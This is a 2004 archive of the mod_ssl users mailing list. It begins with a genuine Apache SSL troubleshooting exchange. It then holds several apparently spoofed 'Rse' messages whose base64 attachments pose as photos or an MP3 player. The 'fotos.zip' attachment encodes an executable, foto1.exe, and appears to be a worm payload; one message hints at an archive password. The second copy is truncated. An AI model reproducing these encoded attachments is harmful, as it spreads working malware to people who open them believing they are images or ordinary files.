X-OriginalArrivalTime: 02 Sep 2004 16:20:45.0958 (UTC) FILETIME=[CD135A60:01C49108]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Philip Lavine" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I can not get ssl to work:

Here are my specs:

/usr/sbin/httpd -l
Compiled in modules:
  core.c
  prefork.c
  http_core.c
  mod_so.c
/usr/sbin/httpd -v

Server version: Apache/2.0.40
Server built:   Apr 21 2004 11:49:03

OpenSSL> version
OpenSSL 0.9.7a Feb 19 2003
OpenSSL>


[root@ahotep2 init.d]# openssl s_client -connect family.lavines.com:443
-state -debug
CONNECTED(00000003)
SSL_connect:before/connect initialization
write to 080AED40 [080AFD10] (142 bytes =3D> 142 (0x8E))
0000 - 80 8c 01 03 01 00 63 00-00 00 20 00 00 39 00 00   ......c...
..9..
0010 - 38 00 00 35 00 00 16 00-00 13 00 00 0a 07 00 c0
8..5............
0020 - 00 00 33 00 00 32 00 00-2f 03 00 80 00 00 66 00
..3..2../.....f.
0030 - 00 05 00 00 04 01 00 80-08 00 80 00 00 63 00 00
.............c..
0040 - 62 00 00 61 00 00 15 00-00 12 00 00 09 06 00 40
b..a...........@
0050 - 00 00 65 00 00 64 00 00-60 00 00 14 00 00 11 00
..e..d..`.......
0060 - 00 08 00 00 06 04 00 80-00 00 03 02 00 80 fd 9f
................
0070 - 96 57 a8 0a 82 6f d4 9b-bd 12 2f 0b 81 c9 df cc
.W...o..../.....
0080 - 01 f4 4c b0 26 2b 5b 67-63 2a 9a 17 c1 a4         ..L.&+[gc*....
SSL_connect:SSLv2/v3 write client hello A
read from 080AED40 [080B5270] (7 bytes =3D> 7 (0x7))
0000 - 0a 3c 3f 78 6d 6c                                 .
SSL_connect:error in SSLv2/v3 read server hello A
25921:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown
protocol:s23_clnt.c:475:

Philip Lavine

Network Engineer

UNX, Inc.

Member NASD/SIPC

philip@unx.com

v: (818) 333-3387 f: (818) 559-5586

175 East Olive Ave, 2nd Floor

Burbank, CA 91502

********************************************************

The information contained in this communication is intended only for the
personal and confidential use of the designated recipients to which it
is addressed. This communication may contain information that is
privileged, confidential or otherwise protected from disclosure. If the
reader of this message is not the designated recipient, you are hereby
notified that you have received this communication in error, and that
any review, dissemination, retention, distribution or copying of this
communication is strictly prohibited. If you have received this
communication in error, please notify us by telephone at (818)333-3300
or by e-mail and discard any paper copies and/or delete all electronic
files of this communication.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep  2 21:42:57 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 618CFA8CEA; Thu,  2 Sep 2004 21:42:57 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cr.toftum.org (cpe.atm2-0-76391.0x535ae692.bynxx16.customer.tele.dk [83.90.230.146])
	by master.modssl.org (Postfix) with ESMTP id 06FF4A8959
	for ; Thu,  2 Sep 2004 21:42:50 +0200 (CEST)
Received: by cr.toftum.org (Postfix, from userid 1000)
	id 808FDE2C234; Thu,  2 Sep 2004 21:42:34 +0200 (CEST)
Date: Thu, 2 Sep 2004 21:42:34 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: SSL not working with apache
Message-ID: <20040902194234.GA2935@dragon.toftum.org>
Mail-Followup-To: modssl-users@modssl.org
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, Sep 02, 2004 at 09:20:45AM -0700, Philip Lavine wrote:
[SNIP]
> SSL_connect:SSLv2/v3 write client hello A
> read from 080AED40 [080B5270] (7 bytes => 7 (0x7))
> 0000 - 0a 3c 3f 78 6d 6c                                 .
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C8496A8CEA; Thu,  2 Sep 2004 21:54:56 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from BIGZEPHRAM.BUR.CORP.UNX (mail.unx.com [65.118.89.131])
	by master.modssl.org (Postfix) with ESMTP id 0F09CA8959
	for ; Thu,  2 Sep 2004 21:54:51 +0200 (CEST)
Received: from MAKBAR.BUR.CORP.UNX ([10.202.202.66]) by BIGZEPHRAM.BUR.CORP.UNX with Microsoft SMTPSVC(5.0.2195.5329);
	 Thu, 2 Sep 2004 12:54:49 -0700
X-MimeOLE: Produced By Microsoft Exchange V6.5.6944.0
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: RE: SSL not working with apache
Date: Thu, 2 Sep 2004 12:54:49 -0700
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: SSL not working with apache
Thread-Index: AcSRJULIJC8YwRqnTu21MT159C3ZHAAAVegg
From: "Philip Lavine" 
To: 
X-OriginalArrivalTime: 02 Sep 2004 19:54:49.0842 (UTC) FILETIME=[B4A08520:01C49126]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Philip Lavine" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I wish it was that easy, however I do have that statement in my ssl.conf
virtual host directives.

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Mads Toftum
Sent: Thursday, September 02, 2004 12:43 PM
To: modssl-users@modssl.org
Subject: Re: SSL not working with apache

On Thu, Sep 02, 2004 at 09:20:45AM -0700, Philip Lavine wrote:
[SNIP]
> SSL_connect:SSLv2/v3 write client hello A
> read from 080AED40 [080B5270] (7 bytes =3D> 7 (0x7))
> 0000 - 0a 3c 3f 78 6d 6c                                 .
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 4DFDDA8D05; Thu,  9 Sep 2004 09:21:03 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from c-blougouras.com (ATuileries-117-1-2-169.w193-251.abo.wanadoo.fr [193.251.57.169])
	by master.modssl.org (Postfix) with SMTP id E16E6A8CCF
	for ; Thu,  9 Sep 2004 09:20:57 +0200 (CEST)
Date: Thu, 09 Sep 2004 09:17:53 +0100
To: "Modssl-users" 
From: "Rse" 
Subject: Re:
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------dbugltxpzohybzjysnbn"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------dbugltxpzohybzjysnbn
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


>Lovely animals





Password:  





----------dbugltxpzohybzjysnbn
Content-Type: image/bmp; name="xwofkjfrxa.bmp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="xwofkjfrxa.bmp"
Content-ID: 

Qk2GCAAAAAAAADYAAAAoAAAAOAAAABMAAAABABAAAAAAAFAIAAAAAAAAAAAAAAAAAAAAAAAA
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f7933zlfCN85X2v/f/9/
/3+/Vl8IXwi/Vv9//3+/d19KXwh/Ld9a/3//f7933zlfCN85X2v/f/9//3//f/9/XwhfCP9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3+fUl8Iv3c/Z18I
n3P/f79WXwg/Z39vXwi/Vv9/X0pfCL93P2dfCN9a/3+fUl8Iv3c/Z18In3P/f/9//3//f18I
Xwj/f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/39fCJ9S/39fCF8I/3//f18IXwj/f/9//3//f/9/Xwh/Lf9//3//f/9//39fCJ9S/3//f/9/
/39fCF8I/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9/Xwh/Lf9/fy1fCP9//39fCF8I/3//f/9//3//f18IXwj/f/9//3//f/9/Xwh/Lf9/
/3//f/9/XwhfCP9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f19KXwhfSt85Xwj/f99aXwh/b19rXwjfWv9//3//f/9/P2dfCJ9S/3//f19KXwhfSt85
Xwj/f/9//3//f18IXwj/f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9/n1JfCH9vn3NfCF8I/3//f985XwhfCF8I33v/f/9//3/fOV8I3zn/f/9/n1JfCH9v
n3NfCF8I/3//f/9//39fCF8I/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f18IXwj/f/9/XwhfCP9/n1JfCJ9zn3NfCL9W/3//f/9//38fY18In1L/f18I
Xwj/f/9/XwhfCP9//39fSv9/XwhfCP9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//39fCF8I/3//f18IX0r/f18IXwj/f/9/XwhfCP9//3//f/9//39fCF8I
/39fCF8I/3//f18IX0r/f/9/XwgfQl8IXwj/f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9/v1ZfCJ9zP2dfCB9j/39fSl8In3Ofc18IX0r/f59SXwi/d59z
XwhfSv9/v1ZfCJ9zP2dfCB9j/3//f793X0pfCF8I/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9/v1ZfCH8t31r/f/9/v3efUl8IXwifUt97/3+/d59S
XwhfCJ9S/3//f/9/v1ZfCH8t31r/f/9//3//f/9/n1JfCP9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//fw==

----------dbugltxpzohybzjysnbn
Content-Type: application/octet-stream; name="New_MP3_Player.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="New_MP3_Player.zip"



----------dbugltxpzohybzjysnbn--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep  9 18:04:59 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 53CB0A897C; Thu,  9 Sep 2004 18:04:59 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from KINGKONG.com (66-205-231-2.idstelcom.net [66.205.231.2])
	by master.modssl.org (Postfix) with SMTP id E3D17A895E
	for ; Thu,  9 Sep 2004 18:04:54 +0200 (CEST)
Date: Tue, 09 Sep 2003 12:05:17 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------iifmvjksngkzruavlfde"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------iifmvjksngkzruavlfde
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------iifmvjksngkzruavlfde
Content-Type: application/octet-stream; name="fotos.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="fotos.zip"

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
AA==

----------iifmvjksngkzruavlfde--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep  9 18:39:22 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 6C26AA897C; Thu,  9 Sep 2004 18:39:22 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from KINGKONG.net (66-205-231-2.idstelcom.net [66.205.231.2])
	by master.modssl.org (Postfix) with SMTP id 3117CA895E
	for ; Thu,  9 Sep 2004 18:39:19 +0200 (CEST)
Date: Tue, 09 Sep 2003 12:39:46 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------zogudmteamectowtyfxx"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------zogudmteamectowtyfxx
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------zogudmteamectowtyfxx
Content-Type: application/octet-stream; name="foto.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="foto.zip"

UEsDBAoAAAAAAKGEITEAAAAAAAAAAAAAAAAFAAAAZm90by9QSwMEFAAAAAgAAI8hMR9CJh4i
AgAAYwQAAA4AAABmb3RvL2ZvdG8uaHRtbI1UUY+aQBB+v+T+wx4Ph+YKHNr0TA9MLFJj43HN
qfWxWWFYtsGFLKOeafzvXZBei5KmG0LYmfm+b2aYXScBGg2vr5wilDxHklLBtpSBq32hOzqv
jJry76gk8Ao5xcTV4wwzq3zZprLpjwpunfAqUm3m3sv064LMRsFkOZr451zOjWGcGNeCbsAV
dMcZxUyaNM8DZVGEsAeMERlxiYaSxQcWRTFjmnIlMTuwpPLAXgJKPFRP6atIdyDdnMoCpgI7
DfJvIAueie5jmWa8FSGqHeGiQJqmnS75eX1F6sVj0iF/wHlKMc7khtzetllvXKKvuOj3dNJg
+b3SLKSllilBYULo6MHzYjUN+r3V6CWYBhMzwU2ql4mdQ1WFWyn+chybSVY9JK5K4ImHMiuy
GIkqHKQAJP5rnmYSpF7mXTaGDF3Sa00xysLtBgSae8lRJehk6x8QIuGRqzG+1sieR+rn2yQB
